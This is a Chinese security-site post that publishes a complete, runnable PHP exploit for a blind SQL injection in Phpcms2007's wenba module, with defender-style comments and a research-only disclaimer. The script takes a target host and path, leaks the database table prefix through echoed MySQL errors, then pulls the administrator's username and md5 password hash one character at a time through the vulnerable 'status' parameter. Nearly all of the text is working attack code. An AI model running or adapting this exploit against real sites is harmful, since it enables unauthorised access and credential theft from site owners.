作者:oldjun
早前在phpcms 0day频发的时候写的这个exp,藏着这个exp藏了一个多月吧,也没有拿它去打站,一直丢在我硬盘里,今天看到11期的黑防公布了,于是我也丢出来吧:
<?
// Phpcms2007 (wenba) blind SQL injection / admin credentials disclosure
// exploit by oldjun (S.U.S). Command-line script: argv[1] is the target host
// (no scheme), argv[2] is the web path to the phpcms installation.
//
// What the script below demonstrates, from a defender's point of view:
//  - the `status` parameter of wenba/my_answer.php reaches a SQL statement
//    unvalidated; every probe injects through it, using `/**/` in place of
//    whitespace;
//  - a MySQL syntax error echoed back to the client ("in your SQL syntax")
//    leaks the real table prefix;
//  - the page's "sorry / no records" message (the six chr() bytes below are
//    the GBK encoding of 对不起) serves as a boolean oracle to read the
//    member table one byte at a time.
// Mitigation: cast `status` to int or use parameterised queries, and do not
// return database error text to clients. Detection: long runs of requests to
// wenba/my_answer.php from one source whose `status` value contains `/**/`,
// `union`, `select` or `ASCII(SUBSTRING(`.
print_r(' -------------------------------------------------------------------------------- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit BY oldjun[S.U.S](http://www.oldjun.com) -------------------------------------------------------------------------------- ');
if ($argc<3) {
    // Usage banner, then exit.
    print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- ');
    die;
}

// Sends one raw HTTP request to $host on TCP port 80 (hard-coded; plain HTTP
// only) and stores the whole response, headers included, in the global $html.
// Terminates the script if the connection cannot be opened.
function sendpacketii($packet) {
    global $host, $html;
    $ock=fsockopen(gethostbyname($host),'80');
    if (!$ock) { echo 'No response from '.$host; die; }
    fputs($ock,$packet);
    $html='';
    while (!feof($ock)) { $html.=fgets($ock); }
    fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_"; // default table prefix; replaced below if the server leaks the real one
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2"; // fixed, arbitrary session id; only sent with the first probe
// The path must start and end with '/'.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo "Error... check the path!/r/n/r/n"; die;}

/*get $prefix*/
// Step 1: send a deliberately malformed statement. If the application echoes
// the MySQL error ("in your SQL syntax"), the text between "FROM " and
// "wenba_answer" in that error is taken as the real table prefix.
// Defender note: this step only works because database error text is
// returned to the client.
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0/r/n";
$packet.="Host: ".$host."/r/n";
$packet.="Cookie: ".$cookie."/r/n";
$packet.="Connection: Close/r/n/r/n";
sendpacketii($packet);
//echo $html;
if (eregi("in your SQL syntax",$html)) {
    $temp=explode("FROM ",$html);
    if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}
    if($temp2[0]) $prefix=$temp2[0];
    echo "[+]prefix -> ".$prefix."/r/n";
}
echo "[~]exploting now,plz waiting.../r/n/r/n";

// Step 2: precondition check. With an always-true condition the page should
// list answers; if it still shows the "sorry" message (GBK 对不起) the wenba
// table is empty, the oracle below cannot tell true from false, and the
// script stops.
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0/r/n";
$packet.="Host: ".$host."/r/n";
$packet.="Connection: Close/r/n/r/n";
sendpacketii($packet);
if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... 
There is no data in wenba,please register two users.One asks then the other answers!/r/n/r/n"; die;}

// Step 3: boolean-based blind extraction of the password field of userid=1
// (the banner calls this the admin account). Candidate bytes are NUL, used
// as the end-of-string marker, plus the 16 hex characters, because the stored
// value is expected to be an md5 hex digest. For each position $j every
// candidate $i is asked as a subselect; a reply without the "sorry" marker
// means the guess was right. At most 17 requests per character.
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0))) {
    for ($i=0; $i<=255; $i++) {
        if (in_array($i,$chars)) {
            $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0/r/n";
            $packet.="Host: ".$host."/r/n";
            $packet.="Connection: Close/r/n/r/n";
            sendpacketii($packet);
            if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."/r/n";break;}
        }
        // No candidate matched at this position: give up.
        if ($i==255) {die("Exploit failed...");}
    }
    $j++;
}

// Step 4: same oracle for the username field, but over the full byte range
// 0..255, so up to 256 requests per character. NUL again ends the string.
$j=1;$username="";
while (!strstr($username,chr(0))) {
    for ($i=0; $i<=255; $i++) {
        $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0/r/n";
        $packet.="Host: ".$host."/r/n";
        $packet.="Connection: Close/r/n/r/n";
        sendpacketii($packet);
        if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."/r/n";break;}
        if ($i==255) {die("Exploit failed...");}
    }
    $j++;
}

print_r(' -------------------------------------------------------------------------------- [+]username -> '.$username.' [+]password(md5 32λ) -> '.$password.' -------------------------------------------------------------------------------- ');

// True when the trimmed $hash begins with 32 lowercase hex characters, i.e.
// looks like an md5 digest (anchored at the start only).
function is_hash($hash) {
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";}
?>
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。